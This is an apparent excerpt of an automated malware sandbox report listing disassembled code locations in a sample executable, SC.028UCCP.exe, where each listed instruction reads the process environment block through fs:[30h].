Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8A5E7 mov ebx, dword ptr fs:[00000030h]	6_2_34E8A5E7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8A5E7 mov eax, dword ptr fs:[00000030h]	6_2_34E8A5E7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDC5FC mov eax, dword ptr fs:[00000030h]	6_2_34EDC5FC
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]	6_2_34E4F5C7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]	6_2_34E4F5C7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]	6_2_34E4F5C7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]	6_2_34E4F5C7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]	6_2_34E4F5C7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]	6_2_34E4F5C7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]	6_2_34E4F5C7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]	6_2_34E4F5C7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4F5C7 mov eax, dword ptr fs:[00000030h]	6_2_34E4F5C7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED05C6 mov eax, dword ptr fs:[00000030h]	6_2_34ED05C6
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8C5C6 mov eax, dword ptr fs:[00000030h]	6_2_34E8C5C6
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E865D0 mov eax, dword ptr fs:[00000030h]	6_2_34E865D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED85AA mov eax, dword ptr fs:[00000030h]	6_2_34ED85AA
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E545B0 mov eax, dword ptr fs:[00000030h]	6_2_34E545B0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E545B0 mov eax, dword ptr fs:[00000030h]	6_2_34E545B0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECE588 mov eax, dword ptr fs:[00000030h]	6_2_34ECE588
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECE588 mov eax, dword ptr fs:[00000030h]	6_2_34ECE588
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8A580 mov eax, dword ptr fs:[00000030h]	6_2_34E8A580
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8A580 mov eax, dword ptr fs:[00000030h]	6_2_34E8A580
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E89580 mov eax, dword ptr fs:[00000030h]	6_2_34E89580
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E89580 mov eax, dword ptr fs:[00000030h]	6_2_34E89580
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F0F582 mov eax, dword ptr fs:[00000030h]	6_2_34F0F582
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E82594 mov eax, dword ptr fs:[00000030h]	6_2_34E82594
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDC592 mov eax, dword ptr fs:[00000030h]	6_2_34EDC592
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6C560 mov eax, dword ptr fs:[00000030h]	6_2_34E6C560
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6E547 mov eax, dword ptr fs:[00000030h]	6_2_34E6E547
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1A553 mov eax, dword ptr fs:[00000030h]	6_2_34F1A553
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E86540 mov eax, dword ptr fs:[00000030h]	6_2_34E86540
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E88540 mov eax, dword ptr fs:[00000030h]	6_2_34E88540
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5254C mov eax, dword ptr fs:[00000030h]	6_2_34E5254C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F2B55F mov eax, dword ptr fs:[00000030h]	6_2_34F2B55F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F2B55F mov eax, dword ptr fs:[00000030h]	6_2_34F2B55F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8F523 mov eax, dword ptr fs:[00000030h]	6_2_34E8F523
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]	6_2_34E6252B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]	6_2_34E6252B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]	6_2_34E6252B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]	6_2_34E6252B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]	6_2_34E6252B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]	6_2_34E6252B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6252B mov eax, dword ptr fs:[00000030h]	6_2_34E6252B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E81527 mov eax, dword ptr fs:[00000030h]	6_2_34E81527
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92539 mov eax, dword ptr fs:[00000030h]	6_2_34E92539
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E53536 mov eax, dword ptr fs:[00000030h]	6_2_34E53536
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E53536 mov eax, dword ptr fs:[00000030h]	6_2_34E53536
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4753F mov eax, dword ptr fs:[00000030h]	6_2_34E4753F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4753F mov eax, dword ptr fs:[00000030h]	6_2_34E4753F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4753F mov eax, dword ptr fs:[00000030h]	6_2_34E4753F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]	6_2_34E7E507
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]	6_2_34E7E507
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]	6_2_34E7E507
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]	6_2_34E7E507
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]	6_2_34E7E507
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]	6_2_34E7E507
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]	6_2_34E7E507
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E507 mov eax, dword ptr fs:[00000030h]	6_2_34E7E507
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8C50D mov eax, dword ptr fs:[00000030h]	6_2_34E8C50D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8C50D mov eax, dword ptr fs:[00000030h]	6_2_34E8C50D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E52500 mov eax, dword ptr fs:[00000030h]	6_2_34E52500
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4B502 mov eax, dword ptr fs:[00000030h]	6_2_34E4B502
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDC51D mov eax, dword ptr fs:[00000030h]	6_2_34EDC51D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E71514 mov eax, dword ptr fs:[00000030h]	6_2_34E71514
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E71514 mov eax, dword ptr fs:[00000030h]	6_2_34E71514
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E71514 mov eax, dword ptr fs:[00000030h]	6_2_34E71514
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E71514 mov eax, dword ptr fs:[00000030h]	6_2_34E71514
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E71514 mov eax, dword ptr fs:[00000030h]	6_2_34E71514
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E71514 mov eax, dword ptr fs:[00000030h]	6_2_34E71514
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]	6_2_34EFF51B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]	6_2_34EFF51B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]	6_2_34EFF51B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]	6_2_34EFF51B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]	6_2_34EFF51B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]	6_2_34EFF51B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF51B mov ecx, dword ptr fs:[00000030h]	6_2_34EFF51B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF51B mov ecx, dword ptr fs:[00000030h]	6_2_34EFF51B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]	6_2_34EFF51B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]	6_2_34EFF51B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]	6_2_34EFF51B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]	6_2_34EFF51B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFF51B mov eax, dword ptr fs:[00000030h]	6_2_34EFF51B
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E496E0 mov eax, dword ptr fs:[00000030h]	6_2_34E496E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E496E0 mov eax, dword ptr fs:[00000030h]	6_2_34E496E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5C6E0 mov eax, dword ptr fs:[00000030h]	6_2_34E5C6E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E556E0 mov eax, dword ptr fs:[00000030h]	6_2_34E556E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E556E0 mov eax, dword ptr fs:[00000030h]	6_2_34E556E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E556E0 mov eax, dword ptr fs:[00000030h]	6_2_34E556E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E766E0 mov eax, dword ptr fs:[00000030h]	6_2_34E766E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E766E0 mov eax, dword ptr fs:[00000030h]	6_2_34E766E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECC6F2 mov eax, dword ptr fs:[00000030h]	6_2_34ECC6F2
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECC6F2 mov eax, dword ptr fs:[00000030h]	6_2_34ECC6F2
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E506CF mov eax, dword ptr fs:[00000030h]	6_2_34E506CF
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EF86C2 mov eax, dword ptr fs:[00000030h]	6_2_34EF86C2
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1A6C0 mov eax, dword ptr fs:[00000030h]	6_2_34F1A6C0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7D6D0 mov eax, dword ptr fs:[00000030h]	6_2_34E7D6D0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F186A8 mov eax, dword ptr fs:[00000030h]	6_2_34F186A8
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F186A8 mov eax, dword ptr fs:[00000030h]	6_2_34F186A8
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]	6_2_34E60680
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]	6_2_34E60680
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]	6_2_34E60680
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]	6_2_34E60680
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]	6_2_34E60680
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]	6_2_34E60680
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]	6_2_34E60680
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]	6_2_34E60680
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]	6_2_34E60680
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]	6_2_34E60680
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]	6_2_34E60680
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E60680 mov eax, dword ptr fs:[00000030h]	6_2_34E60680
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECD69D mov eax, dword ptr fs:[00000030h]	6_2_34ECD69D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E58690 mov eax, dword ptr fs:[00000030h]	6_2_34E58690
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F0F68C mov eax, dword ptr fs:[00000030h]	6_2_34F0F68C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EDC691 mov eax, dword ptr fs:[00000030h]	6_2_34EDC691
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED166E mov eax, dword ptr fs:[00000030h]	6_2_34ED166E
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED166E mov eax, dword ptr fs:[00000030h]	6_2_34ED166E
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED166E mov eax, dword ptr fs:[00000030h]	6_2_34ED166E
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8666D mov esi, dword ptr fs:[00000030h]	6_2_34E8666D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8666D mov eax, dword ptr fs:[00000030h]	6_2_34E8666D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8666D mov eax, dword ptr fs:[00000030h]	6_2_34E8666D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E63660 mov eax, dword ptr fs:[00000030h]	6_2_34E63660
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E63660 mov eax, dword ptr fs:[00000030h]	6_2_34E63660
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E63660 mov eax, dword ptr fs:[00000030h]	6_2_34E63660
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E47662 mov eax, dword ptr fs:[00000030h]	6_2_34E47662
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E47662 mov eax, dword ptr fs:[00000030h]	6_2_34E47662
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E47662 mov eax, dword ptr fs:[00000030h]	6_2_34E47662
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E50670 mov eax, dword ptr fs:[00000030h]	6_2_34E50670
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92670 mov eax, dword ptr fs:[00000030h]	6_2_34E92670
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E92670 mov eax, dword ptr fs:[00000030h]	6_2_34E92670
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E53640 mov eax, dword ptr fs:[00000030h]	6_2_34E53640
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6F640 mov eax, dword ptr fs:[00000030h]	6_2_34E6F640
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6F640 mov eax, dword ptr fs:[00000030h]	6_2_34E6F640
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E6F640 mov eax, dword ptr fs:[00000030h]	6_2_34E6F640
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8C640 mov eax, dword ptr fs:[00000030h]	6_2_34E8C640
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8C640 mov eax, dword ptr fs:[00000030h]	6_2_34E8C640
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4D64A mov eax, dword ptr fs:[00000030h]	6_2_34E4D64A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E4D64A mov eax, dword ptr fs:[00000030h]	6_2_34E4D64A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8265C mov eax, dword ptr fs:[00000030h]	6_2_34E8265C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8265C mov ecx, dword ptr fs:[00000030h]	6_2_34E8265C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8265C mov eax, dword ptr fs:[00000030h]	6_2_34E8265C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E85654 mov eax, dword ptr fs:[00000030h]	6_2_34E85654
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5965A mov eax, dword ptr fs:[00000030h]	6_2_34E5965A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E5965A mov eax, dword ptr fs:[00000030h]	6_2_34E5965A
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFD62C mov ecx, dword ptr fs:[00000030h]	6_2_34EFD62C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFD62C mov ecx, dword ptr fs:[00000030h]	6_2_34EFD62C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EFD62C mov eax, dword ptr fs:[00000030h]	6_2_34EFD62C
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E57623 mov eax, dword ptr fs:[00000030h]	6_2_34E57623
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E55622 mov eax, dword ptr fs:[00000030h]	6_2_34E55622
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E55622 mov eax, dword ptr fs:[00000030h]	6_2_34E55622
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8C620 mov eax, dword ptr fs:[00000030h]	6_2_34E8C620
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E50630 mov eax, dword ptr fs:[00000030h]	6_2_34E50630
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8F63F mov eax, dword ptr fs:[00000030h]	6_2_34E8F63F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8F63F mov eax, dword ptr fs:[00000030h]	6_2_34E8F63F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E80630 mov eax, dword ptr fs:[00000030h]	6_2_34E80630
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED8633 mov esi, dword ptr fs:[00000030h]	6_2_34ED8633
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED8633 mov eax, dword ptr fs:[00000030h]	6_2_34ED8633
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ED8633 mov eax, dword ptr fs:[00000030h]	6_2_34ED8633
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EE3608 mov eax, dword ptr fs:[00000030h]	6_2_34EE3608
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EE3608 mov eax, dword ptr fs:[00000030h]	6_2_34EE3608
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EE3608 mov eax, dword ptr fs:[00000030h]	6_2_34EE3608
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EE3608 mov eax, dword ptr fs:[00000030h]	6_2_34EE3608
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EE3608 mov eax, dword ptr fs:[00000030h]	6_2_34EE3608
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34EE3608 mov eax, dword ptr fs:[00000030h]	6_2_34EE3608
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7D600 mov eax, dword ptr fs:[00000030h]	6_2_34E7D600
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7D600 mov eax, dword ptr fs:[00000030h]	6_2_34E7D600
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E8360F mov eax, dword ptr fs:[00000030h]	6_2_34E8360F
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F24600 mov eax, dword ptr fs:[00000030h]	6_2_34F24600
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F0F607 mov eax, dword ptr fs:[00000030h]	6_2_34F0F607
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]	6_2_34E537E4
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]	6_2_34E537E4
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]	6_2_34E537E4
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]	6_2_34E537E4
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]	6_2_34E537E4
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]	6_2_34E537E4
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E537E4 mov eax, dword ptr fs:[00000030h]	6_2_34E537E4
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E7E7E0 mov eax, dword ptr fs:[00000030h]	6_2_34E7E7E0
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E577F9 mov eax, dword ptr fs:[00000030h]	6_2_34E577F9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E577F9 mov eax, dword ptr fs:[00000030h]	6_2_34E577F9
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F0F7CF mov eax, dword ptr fs:[00000030h]	6_2_34F0F7CF
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E507A7 mov eax, dword ptr fs:[00000030h]	6_2_34E507A7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F217BC mov eax, dword ptr fs:[00000030h]	6_2_34F217BC
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1D7A7 mov eax, dword ptr fs:[00000030h]	6_2_34F1D7A7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1D7A7 mov eax, dword ptr fs:[00000030h]	6_2_34F1D7A7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F1D7A7 mov eax, dword ptr fs:[00000030h]	6_2_34F1D7A7
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]	6_2_34ECE79D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]	6_2_34ECE79D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]	6_2_34ECE79D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]	6_2_34ECE79D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]	6_2_34ECE79D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]	6_2_34ECE79D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]	6_2_34ECE79D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]	6_2_34ECE79D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34ECE79D mov eax, dword ptr fs:[00000030h]	6_2_34ECE79D
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F2B781 mov eax, dword ptr fs:[00000030h]	6_2_34F2B781
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34F2B781 mov eax, dword ptr fs:[00000030h]	6_2_34F2B781
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E81796 mov eax, dword ptr fs:[00000030h]	6_2_34E81796
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E81796 mov eax, dword ptr fs:[00000030h]	6_2_34E81796
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E62760 mov ecx, dword ptr fs:[00000030h]	6_2_34E62760
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E91763 mov eax, dword ptr fs:[00000030h]	6_2_34E91763
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E91763 mov eax, dword ptr fs:[00000030h]	6_2_34E91763
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E91763 mov eax, dword ptr fs:[00000030h]	6_2_34E91763
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E91763 mov eax, dword ptr fs:[00000030h]	6_2_34E91763
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E91763 mov eax, dword ptr fs:[00000030h]	6_2_34E91763
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E91763 mov eax, dword ptr fs:[00000030h]	6_2_34E91763
Source: C:\Users\user\Desktop\SC.028UCCP.exe	Code function: 6_2_34E54779 mov eax, dword ptr fs:[00000030h]	6_2_34E54779
